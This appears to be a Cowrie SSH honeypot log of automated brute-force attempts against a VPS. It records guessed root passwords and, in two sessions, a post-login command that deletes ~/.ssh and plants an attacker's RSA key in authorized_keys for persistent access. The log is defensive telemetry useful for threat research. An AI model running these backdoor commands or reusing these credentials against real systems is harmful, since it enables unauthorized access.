{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:20:31.778831Z","src_ip":"180.184.65.100","session":"0b3ec53898e3"}
{"eventid":"cowrie.session.connect","src_ip":"223.247.218.112","src_port":35758,"dst_ip":"1.2.3.4","dst_port":22,"session":"170d902dde77","protocol":"ssh","message":"New connection: 223.247.218.112:35758 (1.2.3.4:22) [session: 170d902dde77]","sensor":"my-vps","timestamp":"2025-08-24T21:20:42.202080Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:20:42.203048Z","src_ip":"223.247.218.112","session":"170d902dde77"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:20:42.393821Z","src_ip":"223.247.218.112","session":"170d902dde77"}
{"eventid":"cowrie.session.closed","duration":"300.9","message":"Connection lost after 300.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:20:42.926964Z","src_ip":"60.221.239.232","session":"d72d42c06cd0"}
{"eventid":"cowrie.login.success","username":"root","password":"asd@123..","message":"login attempt [root/asd@123..] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:20:43.197738Z","src_ip":"223.247.218.112","session":"170d902dde77"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:20:43.634642Z","src_ip":"223.247.218.112","session":"170d902dde77"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:20:43.635430Z","src_ip":"223.247.218.112","session":"170d902dde77"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:20:43.636791Z","src_ip":"223.247.218.112","session":"170d902dde77"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:20:43.829456Z","src_ip":"223.247.218.112","session":"170d902dde77"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:20:44.271283Z","src_ip":"223.247.218.112","session":"170d902dde77"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:20:44.271997Z","src_ip":"223.247.218.112","session":"170d902dde77"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:20:44.465163Z","src_ip":"223.247.218.112","session":"170d902dde77"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:20:44.466066Z","src_ip":"223.247.218.112","session":"170d902dde77"}
{"eventid":"cowrie.session.connect","src_ip":"223.247.218.112","src_port":36003,"dst_ip":"1.2.3.4","dst_port":22,"session":"b01cf214ea63","protocol":"ssh","message":"New connection: 223.247.218.112:36003 (1.2.3.4:22) [session: b01cf214ea63]","sensor":"my-vps","timestamp":"2025-08-24T21:20:44.685488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:20:44.686145Z","src_ip":"223.247.218.112","session":"b01cf214ea63"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:20:44.893167Z","src_ip":"223.247.218.112","session":"b01cf214ea63"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:20:45.761417Z","src_ip":"223.247.218.112","session":"b01cf214ea63"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:20:46.971026Z","src_ip":"223.247.218.112","session":"b01cf214ea63"}
{"eventid":"cowrie.session.connect","src_ip":"223.247.218.112","src_port":36315,"dst_ip":"1.2.3.4","dst_port":22,"session":"19d8016e9b50","protocol":"ssh","message":"New connection: 223.247.218.112:36315 (1.2.3.4:22) [session: 19d8016e9b50]","sensor":"my-vps","timestamp":"2025-08-24T21:20:47.147326Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:20:47.148185Z","src_ip":"223.247.218.112","session":"19d8016e9b50"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:20:47.339470Z","src_ip":"223.247.218.112","session":"19d8016e9b50"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:20:48.144942Z","src_ip":"223.247.218.112","session":"19d8016e9b50"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:20:48.336957Z","src_ip":"223.247.218.112","session":"170d902dde77"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:20:48.338587Z","src_ip":"223.247.218.112","session":"19d8016e9b50"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":60294,"dst_ip":"1.2.3.4","dst_port":22,"session":"e11d45de553f","protocol":"ssh","message":"New connection: 45.88.8.186:60294 (1.2.3.4:22) [session: e11d45de553f]","sensor":"my-vps","timestamp":"2025-08-24T21:21:15.537857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T21:21:16.108912Z","src_ip":"45.88.8.186","session":"e11d45de553f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T21:21:16.109558Z","src_ip":"45.88.8.186","session":"e11d45de553f"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":39860,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb9319e39aed","protocol":"ssh","message":"New connection: 129.226.183.73:39860 (1.2.3.4:22) [session: bb9319e39aed]","sensor":"my-vps","timestamp":"2025-08-24T21:21:16.399014Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:21:16.400552Z","src_ip":"129.226.183.73","session":"bb9319e39aed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:21:16.666355Z","src_ip":"129.226.183.73","session":"bb9319e39aed"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX3edc","message":"login attempt [root/1qaz@WSX3edc] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:21:17.696160Z","src_ip":"129.226.183.73","session":"bb9319e39aed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:21:18.242825Z","src_ip":"129.226.183.73","session":"bb9319e39aed"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:21:18.243741Z","src_ip":"129.226.183.73","session":"bb9319e39aed"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:21:18.244858Z","src_ip":"129.226.183.73","session":"bb9319e39aed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:21:18.507864Z","src_ip":"129.226.183.73","session":"bb9319e39aed"}
{"eventid":"cowrie.login.success","username":"root","password":"13831383","message":"login attempt [root/13831383] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:21:19.038982Z","src_ip":"45.88.8.186","session":"e11d45de553f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:21:19.147243Z","src_ip":"129.226.183.73","session":"bb9319e39aed"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:21:19.148100Z","src_ip":"129.226.183.73","session":"bb9319e39aed"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:21:19.416687Z","src_ip":"129.226.183.73","session":"bb9319e39aed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:21:19.417760Z","src_ip":"129.226.183.73","session":"bb9319e39aed"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":41012,"dst_ip":"1.2.3.4","dst_port":22,"session":"18db920ab2d6","protocol":"ssh","message":"New connection: 129.226.183.73:41012 (1.2.3.4:22) [session: 18db920ab2d6]","sensor":"my-vps","timestamp":"2025-08-24T21:21:19.684867Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:21:19.688940Z","src_ip":"129.226.183.73","session":"18db920ab2d6"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:21:19.739219Z","src_ip":"45.88.8.186","session":"e11d45de553f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:21:19.955077Z","src_ip":"129.226.183.73","session":"18db920ab2d6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:21:21.041726Z","src_ip":"129.226.183.73","session":"18db920ab2d6"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:21:22.312264Z","src_ip":"129.226.183.73","session":"18db920ab2d6"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":42280,"dst_ip":"1.2.3.4","dst_port":22,"session":"35524bf5968c","protocol":"ssh","message":"New connection: 129.226.183.73:42280 (1.2.3.4:22) [session: 35524bf5968c]","sensor":"my-vps","timestamp":"2025-08-24T21:21:22.581923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:21:22.587842Z","src_ip":"129.226.183.73","session":"35524bf5968c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa